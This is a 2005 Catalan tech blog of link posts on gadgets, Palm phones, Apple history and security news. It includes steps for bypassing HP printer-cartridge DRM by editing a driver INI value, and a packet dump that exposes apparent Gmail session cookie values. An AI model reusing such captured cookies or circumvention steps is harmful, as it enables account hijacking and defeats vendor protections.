|
 |
dilluns, 28 / febrer / 2005 |
[Yahoo! News] Downloading: The Next Generation. Un retrat dels usuaris de les xarxes P2P.
In a phone survey of 2,201 U.S. adults, the Pew Internet & American Life Project found that 11 percent owned digital music players. This means at least 22 million players are in the hands of Americans over 18 years old, while millions more are likely blasting tunes into adolescent ears.
|
21:07 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[BoingBoing] HOWTO get a CD, DVD or book listed on Amazon. Quins passos cal fer per aconseguir que Amazon posi a la venda un CD, DVD o llibre produït per nosaltres mateixos. És força simple i costa menys de 200 dòlars:
1 Get an ISBN (for a book), or a UPC (for a CD or DVD). For one book it costs $125, for one CD, $55, for one DVD, $89.
2 Get a bar code based on the ISBN or UPC. Costs $10, or may be included in UPC.
3 Sign up with Amazon, $30 per year.
4 Duplicate your stuff; include the bar code on the outside.
5 Ship two copies to Amazon
6 Send cover scan
7 Track sales
8 Register it (optional)
|
00:04 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[BoingBoing] HOWTO break HP printer cartridge DRM. Com sabeu, HP ha començat a incloure un xip que controla la vida dels cartutxos de tinta de la impressora, de forma que passat un temps deixen de funcionar amb independència de la quantitat de tinta que hagi al seu interior.
Per saltar-se aquesta protecció hi ha dos trucs:
- Treure la bateria utilitzada pel xip de memòria de la impressora.
- Modificar el controlador de Windows de la impressora. Heu de cercar dins dels fitxers HP*.INI el paràmetre pencheck que estarà a 0100. Modifiqueu-lo de forma que el valor sigui 0000, reinicieu la màquina i ja podeu tornar a imprimir.
|
00:01 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
diumenge, 27 / febrer / 2005 |
Col·lecció d'enllaços sobre IPSec: introducció, estàndards, arquitectura, protocols, algoritmes d'autenticació, algoritmes de xifrat, intercanvi de claus, certificats, polítiques; implementacions, software comercial, processadors acceleradors; organitzacions i empreses; llibres.
|
21:52 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
 Publicada la versió 2.3 del projecte OpenPKG, un sistema estandarditzat per a la instal·lació de programes de codi obert disponible per a nombrosos sistemes operatius: FreeBSD, NetBSD, Solaris, Linux (Debian, RedHat, Fedora Core, SuSE, Gentoo, Mandrake) i HP-UX. Aquesta versió dóna suport a Solaris 10, tant a les plataformes SPARC com Intel.
|
20:46 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[mobilepc] The Top 100 Gadgets of All Time. Quin han estat els principals gadgets de la història? Hi trobem joies com el cub de Rubik, el Zippo, el HP Omnibook (un PC amb un processador i386 amb un pes de només 1,3 Kgr), el Nokia 5199, els Wakman de Sony, la primera memòria USB, la navalla suïssa, la calculadora científica HP, l'iPod i el PowerBook... i el Pilot 1000 d'USRobotics, el primer Palm.
|
18:56 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Scripting News] Jef Raskin died last night. Potser el nom de Jef Raskin no us diu massa, però és un dels pares del Macintosh. Gràcies a ell tenim alguns documents bàsics per conèixer la història del Mac, com un impagable The Genesis and History of the Macintosh Project. Jef Raskin era partidari d'una màquina totalment tancada, amb uns principis que afortunadament no van reeixir... com, per exemple, la impossibilitat d'accedir a l'interior de la màquina i l'absència total de possibilitats d'expansió:
Considerations such as these led me to conceive the basic architecture and guiding principles of the Macintosh project. There were to be no peripheral slots so that customers never had to see the inside of the machine (although external ports would be provided); there was a fixed memory size so that all applications would run on all Macintoshes; the screen, keyboard and mass storage device (and, we hoped, a printer) were to be built in so that the customer got a truly complete system, and so that we could control the appareance of characters and graphics.
D'altres idees que va tenir si que són d'agrair: gràcies a ell els ordinadors personals van començar a distingir entre les majúscules i les minúscules
In my first conversation with Steve Jobs and Steve Wozniak, back in the garage that was the original location of Apple, I argued that the Apple I (and later, the II) needed upper- and lowercase on both keyboard and screen.
També en parlen a Microsiervos. I la Wikipedia ja ha actualitzat l'entrada indicant la data de la mort.
|
18:37 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[PacketStormSecurirty] Google Search and Gmail Correlation - Full Disclosure. Sembla que Google fa una correlació entre les cerques i els comptes dels usuaris de GMail (fins i tot quan l'usuari ha desconnectat de GMail). Realitzant un volcat del tràfic s'aprecia que la cookie utilitzada per GMail es transmet en les cerques realitzades a Google:
<-- Not logged into Gmail but Gmail cookie still on my system -->
02/18-10:13:27.109702 192.168.111.8:33262 -> 216.239.63.104:80
TCP TTL:64 TOS:0x0 ID:20271 IpLen:20 DgmLen:838 DF
***AP*** Seq: 0x459C51DB Ack: 0x72CB0C4B Win: 0x16D0 TcpLen: 32
TCP Options (3) => NOP NOP TS: 3874561 6991994
47 45 54 20 2F 73 65 61 72 63 68 3F 68 6C 3D 65 GET /search?hl=e
6E 26 6C 72 3D 26 71 3D 67 6F 6F 67 6C 65 2B 67 n&lr=&q=google+g
6D 61 69 6C 26 62 74 6E 47 3D 53 65 61 72 63 68 mail&btnG=Search
20 48 54 54 50 2F 31 2E 31 0D 0A 48 6F 73 74 3A HTTP/1.1..Host:
20 77 77 77 2E 67 6F 6F 67 6C 65 2E 63 6F 6D 0D www.google.com.
0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F 7A .User-Agent: Moz
69 6C 6C 61 2F 35 2E 30 20 28 58 31 31 3B 20 55 illa/5.0 (X11; U
3B 20 4C 69 6E 75 78 20 69 36 38 36 3B 20 65 6E ; Linux i686; en
2D 55 53 3B 20 72 76 3A 31 2E 37 2E 35 29 20 47 -US; rv:1.7.5) G
65 63 6B 6F 2F 32 30 30 34 31 31 30 37 20 46 69 ecko/20041107 Fi
72 65 66 6F 78 2F 31 2E 30 0D 0A 41 63 63 65 70 refox/1.0..Accep
74 3A 20 74 65 78 74 2F 78 6D 6C 2C 61 70 70 6C t: text/xml,appl
69 63 61 74 69 6F 6E 2F 78 6D 6C 2C 61 70 70 6C ication/xml,appl
69 63 61 74 69 6F 6E 2F 78 68 74 6D 6C 2B 78 6D ication/xhtml+xm
6C 2C 74 65 78 74 2F 68 74 6D 6C 3B 71 3D 30 2E l,text/html;q=0.
39 2C 74 65 78 74 2F 70 6C 61 69 6E 3B 71 3D 30 9,text/plain;q=0
2E 38 2C 69 6D 61 67 65 2F 70 6E 67 2C 2A 2F 2A .8,image/png,*/*
3B 71 3D 30 2E 35 0D 0A 41 63 63 65 70 74 2D 4C ;q=0.5..Accept-L
61 6E 67 75 61 67 65 3A 20 65 6E 2D 75 73 2C 65 anguage: en-us,e
6E 3B 71 3D 30 2E 35 0D 0A 41 63 63 65 70 74 2D n;q=0.5..Accept-
45 6E 63 6F 64 69 6E 67 3A 20 67 7A 69 70 2C 64 Encoding: gzip,d
65 66 6C 61 74 65 0D 0A 41 63 63 65 70 74 2D 43 eflate..Accept-C
68 61 72 73 65 74 3A 20 49 53 4F 2D 38 38 35 39 harset: ISO-8859
2D 31 2C 75 74 66 2D 38 3B 71 3D 30 2E 37 2C 2A -1,utf-8;q=0.7,*
3B 71 3D 30 2E 37 0D 0A 4B 65 65 70 2D 41 6C 69 ;q=0.7..Keep-Ali
76 65 3A 20 33 30 30 0D 0A 43 6F 6E 6E 65 63 74 ve: 300..Connect
69 6F 6E 3A 20 6B 65 65 70 2D 61 6C 69 76 65 0D ion: keep-alive.
0A 52 65 66 65 72 65 72 3A 20 68 74 74 70 3A 2F .Referer: http:/
2F 77 77 77 2E 67 6F 6F 67 6C 65 2E 63 6F 6D 2F /www.google.com/
73 65 61 72 63 68 3F 68 6C 3D 65 6E 26 71 3D 68 search?hl=en&q=h
69 6A 61 63 6B 2B 74 68 69 73 26 62 74 6E 47 3D ijack+this&btnG=
47 6F 6F 67 6C 65 2B 53 65 61 72 63 68 0D 0A 43 Google+Search..C
6F 6F 6B 69 65 3A 20 50 52 45 46 3D 49 44 3D 37 ookie: PREF=ID=7
34 30 39 64 63 64 66 65 36 61 38 38 32 38 62 3A 409dcdfe6a8828b:
54 4D 3D 31 31 30 38 37 34 36 36 31 38 3A 4C 4D TM=1108746618:LM
3D 31 31 30 38 37 34 36 37 37 32 3A 47 4D 3D 31 =1108746772:GM=1
3A 53 3D 62 30 41 5F 6F 4D 7A 38 38 43 45 4E 61 :S=b0A_oMz88CENa
36 4F 72 3B 20 54 5A 3D 34 32 30 3B 20 47 4D 41 6Or; TZ=420; GMA
49 4C 5F 4C 4F 47 49 4E 3D 31 31 30 38 37 34 36 IL_LOGIN=1108746
37 35 37 33 32 34 2F 31 31 30 38 37 34 36 37 35 757324/110874675
37 33 32 34 2F 31 31 30 38 37 34 36 37 37 36 34 7324/11087467764
30 36 2F 31 31 30 38 37 34 36 37 37 38 30 36 31 06/1108746778061
2F 31 31 30 38 37 34 36 37 37 38 35 35 39 2F 31 /1108746778559/1
31 30 38 37 34 36 37 38 30 31 34 32 2F 31 31 30 108746780142/110
38 37 34 36 37 38 30 34 37 34 2F 66 61 6C 73 65 8746780474/false
2F 66 61 6C 73 65 3B 20 53 3D 67 6D 61 69 6C 3D /false; S=gmail=
32 49 31 55 50 63 47 49 67 33 51 3A 67 6D 70 72 2I1UPcGIg3Q:gmpr
6F 78 79 3D 4B 6D 6F 30 4D 6C 44 37 34 36 51 3B oxy=Kmo0MlD746Q;
20 47 4D 41 49 4C 5F 52 54 54 3D 32 33 38 0D 0A GMAIL_RTT=238..
0D 0A
|
15:19 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Microsoft IT Showcase] How Microsoft Does It. Col·lecció de notes tècniques, webcasts i d'altres materials on s'explica com Microsoft aplica les mesures de seguretat dels seus productes per tal de protegir la seva xarxa corporativa: Exchange Server, Microsoft Office, augment de l'espai dels servidors amb Diskpart, SharePoint, Outlook...
|
14:18 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Linux Exposed] DNS Common Abuses. El DNS és un dels protocols bàsics per al funcionament d'Internet. Aquest article explica els principals mètodes d'atac: suplantació (spoof), redirecció (redirect) i emmetzinar la memòria cau (cache poisoning) així com les mesures de protecció existents: llistes de control d'accés, utilització de les versions més modernes i monitorització.
|
14:09 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[MadPenguin] First Looks At Solaris 10. Complet article que analitza alguns dels aspectes més destacables de Solaris 10: DTrace, zones (un concepte semblant a la gàbies chroot, amb la diferència que cada zona és un sistema operatiu virtual, amb la seva pròpia IP, configuració separada i fins i tot programes diferents), Service Management Framework (el nou mètode d'inici del sistema operatiu)...
|
14:03 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
dissabte, 26 / febrer / 2005 |
 Poques vegades un ordinador ha marcat la història... i l'Apple I n'és, sense cap mena de dubte, un d'aquests pocs que realment ho ha aconseguit. Amb uns orígens prou modestos, al mític garatge dels pares de l'Steve Wozniak, l'Apple I no era un ordinador d'una capacitat especialment destacable, ni avui ni llavors. Però va ser la base sobre la que es va crear una empresa que mai no ha deixat indiferent a ningú.
En aquest llibre és únic en molts aspectes doncs es pot considerar una guia pas a pas per a construir un Apple I, utilitzant un kit distribuït per Briel Computers. Al llibre s'explica des de com fer les soldadures a com programar en assembler i BASIC:
- BUILD IT, explica com agafar totes les peces del kit per construir l'ordinador.
- PROGRAM IT recordant els vells temps, programant amb assembler... sense cap mena d'entorn gràfic :-)
- PLAY WITH IT. Un cop construït, nocions per a desenvolupar software i utilitzar l'ordinador per a fer alguna cosa útil.
- MODIFY IT. La gràcia d'aquests kits es que no siguin models estàtics, sinó que tinguem la capacitat de millorar-ne el disseny.
És doncs un llibre pensat pels afeccionats a l'electrònica que volen fer un projecte prou curiós i que, a més, permet reflexionar sobre com ha evolucionat la indústria.
El llibre a Amazon.com i a Amazon.co.uk.
Títol: Apple I Replica Creation: Back to the garage
Autors: Tom Owad i Steve Wozniak (introducció)
1a edició (Març 2005)
333 pàgines
ISBN: 1-93-1836-40X
|
22:09 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
divendres, 25 / febrer / 2005 |
 Acabo de veure que LaCie anuncia un disc dur que es connecta directament a la xarxa. Amb capacitats de 250, 400 i 500 GB es pot connectar directament a l'ordinador (via USB 2.0) o bé, i això és el que el fa més interessant, a la xarxa Ethernet.
És interessant en primer lloc per la velocitat (100 Mbps) i per oferir l'accés al contingut del disc dur sense necessitat de cap ordinador que hi faci de servidor. El disc dur es connecta a la xarxa i obté una adreça IP via DHCP. El disc és accessible via SMB, AFP, FTP i HTTP.
La configuració de l'accés es realitza amb una interfície web, amb possibilitats de definir restriccions als diversos recursos del disc i diversos perfils d'usuaris. L'accés al disc dur, quan està connectat a la xarxa és multiusuari.
Podeu consultar més detalls a les especificacions tècniques.
|
21:27 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Ja he fet la comanda del nou portàtil... tal com us vaig indicar, al final he escollit el Dell Precision M70, amb aquesta configuració:Processador Intel 770 2,12 GHz
Pantalla WUXGA 15,4" (1920x1200)
Targeta nVidia Quadro FX Go1400 256 MB
HD 60 GB (7200 rpm)
1 port sèrie
4 ports USB 2.0
1 targeta PCMCIA
1 GB memòria RAM 533 MHz
DVD +/- RW 7x
Targeta Intel PROWireless 2915 802.11a/b/g
Targeta 10/100/1000 Ethernet6 i Mòdem V92
Targeta Dell Wireless 350 Bluetooth
3 anys de garantia + assegurança accidents i robatori
Només hi falta una cosa per ser la configuració perfecta: l'absència del port IEEE 1394 (Firewire). Per quins setze ous Dell no l'inclou? Ara hauré de canviar el meu disc dur extern per un d'USB.
Jo només em queda esperar mentre la gent de Dell el fabrica, el prova i l'envia per transportista fins a casa. En aquests moments l'equip està en estat de pre-producció, esperant la disponibilitat dels diversos components. La data estimada de lliurament és el 7 de març.
|
20:29 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Dilluns explicava que s'havia descoberta la presència de controladors WiFi a la memòria ROM del Treo 650. Avui la notícia es que això ha estat una falsa alarma... Ho expliquen a engadget: Actually, there aren't WiFi drivers hidden in the Treo 650.
I think I goofed, the Wifi drivers are not in the phones memory, that was left overs from when I had them installed on the Sd card, Sorry folks. I had some others double check my work with their own GSM phones, it's not there.
Again, sorry about that...
Llàstima... un Treo 650 amb capacitat d'accés a les xarxes sense fils 802.11 hauria estat una autèntica meravella.
|
19:43 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
PalmOne ha començat a acceptar comandes per al Treo 650 a diversos països d'Europa: Itàlia, Irlanda, Països Baixos, Bèlgica, Luxemburg, Dinamarca, Suècia, Finlàndia, Grècia i Portugal.
Això sí... estan bojos: a tots aquests països el preu és de 799 729 euros (excepte a Itàlia on només costa 699 euros).
Una alternativa més econòmica és comprar el Treo 650 amb un contracte específic d'una companyia. Així, Orange oferirà el Treo 650 al Regne Unit, França i Suïssa a partir del proper 1 de març. També TIM (Telecom Italia Mobile) ha anunciat la seva propera disponibilitat.
La notícia també ha estat recollida per CanalPDA.
|
18:53 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Slashdot] SysInternals releases RootkitRevealer. És una eina gratuïta per a la detecció de rootkits a Windows (NT 4.0, 2000, XP) i que pot verificar tant el sistema local com un altre sistema de la xarxa.
Recordeu que per rootkit s'anomenen els mecanismes i tècniques utilitzats pel malware (virus, cucs, programes espies...) per tal d'ocultar la seva presència dins d'un ordinador i evitar ser detectat.
|
06:29 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
dijous, 24 / febrer / 2005 |
|
dimecres, 23 / febrer / 2005 |
[Google Watch] Google's new toolbar: Now more evil than ever
For starters, Google's toolbar phones home with every page you land on, and tattles to Google what you're looking at, while offering up your globally-unique Google cookie ID that expires in 2038
As if that wasn't enough, the toolbar updates automatically, without asking.
I si amb això no n'hi ha prou, amb la versió 3.0 de la Google Toolbar (en fase beta) s'inclou una funció, AutoLink que segons la descripció de Google permet identificar les adreces postals de les pàgines web i mostrar un mapa.
Però en realitat és una funció molt perillosa i que posa en perill la pròpia essència de la web: AutoLink modifica el contingut de les pàgines web que visitem, afegint els enllaços que escull Google.
Un exemple, citat al document que enllaço i que jo he verificat: visitant la web de Barnes and Noble, una de les principals botigues de llibres a la xarxa, en visualitzar la informació d'un llibre el codi ISBN es converteix en un enllaç... que apunta a Amazon, la competència de Barnes and Noble. Un text que fins ara era una simple informació, per decisió de Google es converteix en un enllaç que ens porta allà on volen/decideixen els propietaris del cercador nord-americà.
Per dir-ho amb paraules més planeres: Google està provant de fer allò que ni tan sols Microsoft s'atreviria a fer.
|
20:38 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
 Acaba de publicar-se la versió 1.2.1 de rootkit hunter, un conjunt d'eines que permeten determinar l'existència de rootkits, portes secretes i exploits dins d'una màquina Linux. La determinació es fa a través de la comparació del hash MD5 dels fitxers, la identificació de fitxers sospitosos, els canvis en els permisos dels fitxers, la presència de determinades cadenes de text i, opcionalment, la cerca de text dins els fiters binaris.
|
07:56 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Sembla que la liquidació dels últims Treo 600 ja ha començat. La tenda online de PalmOne ofereix el Treo 600, lliure, per 499 euros (si hi afegiu una targeta de memòria de 256 MB el preu és de 524,51 euros), IVA i despeses d'enviament incloses.
Per cert, si el compreu ara assegureu-vos d'escollir l'opció de missatgeria express, amb servei nocturn (per defecte es selecciona l'enviament per missatgeria estàndard que són uns tres o quatre dies) doncs el preu final no varia.
|
07:45 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Microsoft va publicar fa un parell de mesos una actualització de seguretat per a Windows XP amb Service Pack 2, Windows XP edició Tablet PC 2005 i Windows 2003 Server.
L'actualització soluciona un problema provocat per la instal·lació d'un tallafocs o antivirus (no s'ha indicat quin producte en concret) i que bloquejava l'equip, amb pantalla blava, mostrat aquest missatge d'error:Stop 0x05 (INVALID_PROCESS_ATTACH_ATTEMPT)
El curiós d'aquesta actualització és que no s'ha documentat a cap butlletí de seguretat i des d'ahir surt a les actualitzacions que s'instal·len a través de Windows Update. Hi ha un article de la Knowledge Base que el documenta: You receive the Stop error "Stop 0x05 (INVALID_PROCESS_ATTACH_ATTEMPT)" in Windows XP Service Pack 2 or Windows Server 2003
|
07:34 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
dimarts, 22 / febrer / 2005 |
[F-Secure] Paris Hilton's phone hacked
A list of celebrity phone numbers and email addresses appeared on the Internet after Paris Hilton's T-Mobile Sidekick got hacked. The intruders stole Paris' Sidekick Address Book, Notes and some personal photos. Many of the phone numbers has been verified and found to be valid, until the owners change them, at least. On the list, among others, there is Christina Aguilera, Eminem, Lindsay Lohan and Vin Diesel.
(...)
This only serves as another reminder for people to use difficult enough passwords everywhere and no, pet names are not difficult enough...
|
12:10 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
ImageMagick és un gran conjunt d'eines i utilitats per a la lectura, generació i manipulació d'imatges, en virtualment qualsevol format. Un dels grans avantatges d'ImageMagick és que totalment controlable a través de la línia d'ordres o bé es pot integrar dins de programes escrits en C, C++, PERL, Java, PHP, Python...
A Examples of ImageMagick Usage trobareu diversos exemples de com realitzar tasques de manipulació de text, creació d'imatges animades, generació de taules d'imatges, creació de fons gràfics, conversió de formats...
ImageMagick està disponible per a Linux (i d'altres sistemes Unix), Windows, Mac i OS/2.
|
08:53 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[eEye Digital Security White Paper] Remote Windows Kernel Exploitation Step into the Ring O
In the article that follows, I will walk through the remote exploitation of a kernel-based vulnerability. The example I use was a flaw in the Symantec line of personal firewalls. The flaw existed due to incorrect handling of DNS responses. This issue was patched long ago, but it was chosen as it demonstrates certain obstacles relating to the communication layers that must be overcome when exploiting a hostbased firewall.
I will provide two shell code examples: the first is a “kernel loader”, which will allow you to plug in and execute any user-land code you wish; the second operates entirely at the kernel level. A keystroke logger is installed and the keystroke buffer may be retrieved from a remote system. This example demonstrates more of an old school software crack than that of network shell code.
|
07:54 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
arp-sk és una eina per jugar amb el protocol ARP. Hi ha versió per a Linux i per a Windows. A la pàgina web del projecte, a més, hi ha moltíssima informació sobre aquest protocol.
|
07:26 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Schneier on Security] SHA-1 Broken i Cryptanalysis of SHA-1. Tal com ja vaig indicar el passat 11 de febrer,el NIST aconsellava abandonar l'algoritme de xifrat SHA-11... i només uns dies després, a través del weblog de Bruce Schneier veig que l'algortime ja ha estat trencat:
SHA-1 has been broken. Not a reduced-round version. Not a simplified version. The real thing.
The research team of Xiaoyun Wang, Yiqun Lisa Yin, and Hongbo Yu (mostly from Shandong University in China) have been quietly circulating a paper announcing their results.
- collisions in the the full SHA-1 in 2**69 hash operations, much less than the brute-force attack of 2**80 operations based on the hash length.
- collisions in SHA-0 in 2**39 operations.
- collisions in 58-round SHA-1 in 2**33 operations.
This attack builds on previous attacks on SHA-0 and SHA-1, and is a major, major cryptanalytic result. It pretty much puts a bullet into SHA-1 as a hash function for digital signatures (although it doesn't affect applications such as HMAC where collisions aren't important). Sobre aquest tema, s'ha escrit força: More on Newly Broken SHA-1, Crypto researchers break SHA-1, Researchers find security flaw in SHA-1 algorithm, SHA-1 broken...?, Researchers: Digital encryption standard flawed, SHA-1 Broken... així com els primers efectes: PGP moving to stronger SHA Algorithm.
|
06:55 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
 Tens complex d'inferioritat per no saber escriure als canals d'IRC com ho fa la gent més cool? T'agradaria poder dir que:
V0Ls P0d3R 35cr1Ur3 COM El5 p41O5 Mé5 K3WL Kw3 3$Cr1UEN @L5 C@N4l5 De xAt? O bé vols fer el pas invers i traduir a text intel·ligible allò que alguna gent escriu?
La solució: «l33t sp34k g3Ner4+0r».
|
06:28 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
dilluns, 21 / febrer / 2005 |
[Mobile Pipeline] Many Wireless Security Breaches Reported At Security Conference.
There were 32 "Evil Twin" attacks and many other types of security breaches aimed at Wi-Fi users of the recently-concluded RSA security conference, wireless security vendor AirDefense claimed Thursday.
In an Evil Twin attack, hackers set up bogus access points and try to get nearby wireless users to log on either. Then, they can steal information that the user transmits The use of this method of attack marks a significant shift in how eavesdroppers and hackers are trying to steal information from wireless LAN users, according to the company.
|
23:36 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
 Aquesta tarda passejant pel centre de Terrassa m'he trobat a l'aparador de la «Llibreria Grau», al carrer dels Gavatxons, amb una autèntica joia: la «Historia de les ciencies naturals a Catalunya del Sigle IX al Sigle XVIII», de Font i Sagué en la seva edició original de l'any 1908... i l'he comprat per dotze euros.
Aquesta obra, «premiada en el Concurs celebrat l'any 1905 per la Societat Económica d'Amichs del Pais de Barcelona», és una mostra del moviment cultural de la Renaixença a començaments del segle XX, escrita per un dels màxims exponents de la docència de les ciències naturals de l'època.
El llibre és una posada al dia (de l'època) de les diverses ciències naturals, tal i com s'entenien aleshores: astrologia, cartografia, medicina, epidemiologia, menescalia (estudi dels cavalls), ensenyança, alquímia, química, farmàcia, història natural, agricultura, botànica, varis i una relació de les obres publicades fins a la data sobre ciències naturals.
Evidentment el llibre està força desfasat per als estàndards actuals sobre divulgació científica i està escrita en el català de l'època. Però això no li treu valor per a conèixer la Renaixença de la ciència al nostre país.
Per cert, que la última pàgina del llibre es prou curiosa:
Vicariat General
de la
Diocesis de Barcelona
Per lo que á Nos toca, concedim Nostre permís pera publicarse'l llibre titolat Historia de les Ciencies Naturals á Catalunya del sigle IX al sigle XVIII, escrit per Mossen Norbert Font y Sagué, mediant que de Nostra ordre ha estat examinat, y no conté, segons la censura, cap cosa contraria al dogma católich y á la sana moral. Imprimesques aquesta llicencia al principi ó al final del llibre, y entreguense dos exemplars d'aquesta rubricats pêl Censor, á la Secretaria de Cambra y Gobern d'aquest Bisbat.
Barcelona, Octubre 1908.
Lo Vicari General
Ricardo, Bisbe d'Eudoxia
Per mandat de Sa Senyoría,
Llic. Manel Fernández, Scri. Canc.
|
22:19 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Aquesta tarda tinc molts problemes per accedir a Google des de la connexió de casa (ADSL de Terra). Triga moltíssim... utilitzant un proxy extern de Polònia, l'accés és tant ràpid com de costum.
Algú més pateix aquest problema?
|
21:19 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Ahir al vespre vaig escoltar l'emissió de «l'Internauta», el programa degà sobre Internet a Catalunya. Ja són nou temporades, primer presentat pel malaguanyat Jordi Vendrell i després per Vicent Partal.
Quan va començar aquesta temporada em vaig alegrar sobre el nou format del programa, en que ja no es tractava un tema de forma monolítica sinó que a cada programa es parlava amb gent diversa sobre temes també diversos.
En els últims programes aquesta tendència ha desaparegut i han tornat al format antic... m'imagino que això els hi dóna menys feina, però té el risc de que si el tema no t'interessa el programa es fa un corcó.
De totes formes, si que vull imposar un càstig als locutors del programa: han d'escriure, a mà, cent vegades:
«No tornaré a dir per antena paraules com 'inalàmbric' i 'tamany'»
També hauria d'incloure farola, que si bé es vàlida en català no ho és per referir-se als fanals... però amb els dos exemples anteriors ja us feu a l'idea.
Una altra queixa que faig al programa és la poca vehemència de les entrevistes... per exemple, ahir entrevistant a un responsable de Vodafone no van pensar a preguntar sobre la presència del català als continguts que ofereixen a través del telèfon mòbil (m'imagino que nul·la) o l'autèntica apologia de l'RFDI que van fer ara fa unes setmanes.
De totes formes, «l'Internauta» continua sent un programa força interessant que sempre que puc l'escolto i per tant, des d'aquí, envio el meu reconeixement a totes les persones que el fan possible.
|
20:47 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[BBC] IBM's hot tip for data storage
IBM researchers have gone back to the pioneering days of computers to create a novel method of storing data.
Using this set-up, the IBM researchers managed to cram 500 megabits of data into each three-millimetre square. This is approximately 20 times denser than can be achieved with the best magnetic storage systems today.
|
17:56 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
L'altra dia vaig rebre un missatge d'Amazon.co.uk avisant-me que el proper llibre de la sèrie Harry Potter no estarà disponible d'una forma immediata i que millor l'intenti obtenir a d'altres llocs:
You previously signed up to be notified when Harry Potter and the Half-Blood Prince (Harry Potter 6) became available. Unfortunately, our suppliers have told us that this item will not be available in the foreseeable future.
Poques hores després rebo un segon missatge, també d'Amazon.co.uk dient que el missatge anterior era un error. En primer lloc confirmen que el proper 16 de juliol començaran la distribució del llibre, en la seva versió anglesa... i un comentari que mostra un bon nivell d'humor:
We assure you that howlers have been sent to the muggles responsible for this action and we are investigating the possibility that You-Know-Who may have been involved.
|
17:36 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[übergizmo] PalmOne's WiFi card drivers found dormant in the ROM of the Treo 650. Resulta que a la ROM del Treo 650 hi són inclosos els controladors per a la targeta WiFi de PalmOne, però per alguna raó aquests controladors no estan llistats, de forma que el telèfon desconeix la seva presència.
I found the wifi drivers in the memory image on the gsm 650, but they are NOT listed in rom, the phone doesn't know they are there. They are in a unused location in memory just sitting there with the first characters of the filenames removed. I currently have no clue why they are there, or if they are different from what we already have.
But I intend to research them and compare them... It'll just be a little hard since I have to extract the data byte by byte.
És a dir, que sembla com si el suport de la targeta WiFi hagi estat desactivat a última hora. La feina ara consisteix en determinar la possible existència d'un mètode per activar aquest suport. Podeu trobar més detalls a la discussió dins dels fòrums de TreoCentral.
|
15:04 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Publicada una nova versió de PuTTY. Es tracta d'un client telnet i ssh (v1 i v2) per a Windows i Unix, força popular. Possiblement el principal avantatge de PuTTY respecta a la resta de clients és la seva portabilitat... amb només un fitxer EXE es pot executar a qualsevol màquina, sense que calgui instal·lar-lo ni fer res.
Addicionalment, PuTTY (per cert, un projecte de codi obert) incorpora tot un conjunt d'eines addicionals, com un port de scp (còpia de fitxers segura a través de la xarxa), sftp (ftp amb tràfic xifrat), agent SSH per a l'automatització de connexions, etc...
Aquesta versió és una actualització de seguretat que soluciona un parell de problemes de seguretat que poden ser utilitzades per un servidor malèvol per atacar un client SFTP/SCP.
This version fixes a security hole in previous versions of PuTTY, which can allow a malicious SFTP server to attack your client. If you use either PSCP or PSFTP, you should upgrade. Users of the main PuTTY program are not affected. (However, note that the server must have passed host key verification before this attack can be launched, so a man-in-the-middle shouldn't be able to attack you if you're careful.)
I repeat: PuTTY 0.57 fixes a SERIOUS SECURITY HOLE in many previous versions of PSCP and PSFTP. If you use either of those programs, you should upgrade now.
Actualització: Publicats els detalls de la vulnerabilitat.
|
13:44 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
divendres, 18 / febrer / 2005 |
|
dimecres, 16 / febrer / 2005 |
Al 3GSM World Congress hi han nous rumors sobre un hipotètic Treo que faci servir el sistema operatiu de Microsoft (Windows Mobile), a partir d'unes declaracions d'un directiu de Microsoft.
«Major announcements related to Windows Mobile and Motorola and palmOne will be presented during a press conference at 3GSM.»
|
07:11 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Microsoft] Antispam Technical Alliance Technology and Policy Proposal. ASTA, un consorci format per diversos proveïdors de correu electrònic (Microsoft, AOL, British Telecom, Comcast, EarthLink, Yahoo!...) presenta un document amb consells per la implementació de tecnologies i polítiques de seguretat que ajudin a lluitar contra el correu brossa.
El document explica les tecnologies i la política de seguretat que, de forma coordinada, han implementat els membres d'ASTA a les seves pròpies infraestructures de correu electrònic.
|
07:04 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
WiFiFoFum és un scàner per a la identificació de xarxes WiFi per a PDA que executin el sistema operatiu PocketPC 2003 amb una funció especialment interessant: disposa d'una espècie de radar per ajudar a localitzar la ubicació del punt d'accés.
|
06:56 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Google Hack Honeypot v1.0 implementa la teoria de honeypots per tal d'identificar els possibles atacs realitzats utilitzant les funcions de cerca de Google per tal de trobar vulnerabilitats a la nostra presència web. Permet seguir l'atac, observant les accions realitzades per l'atacant, enregistrant tota la informació per tal de poder ser analitzada.
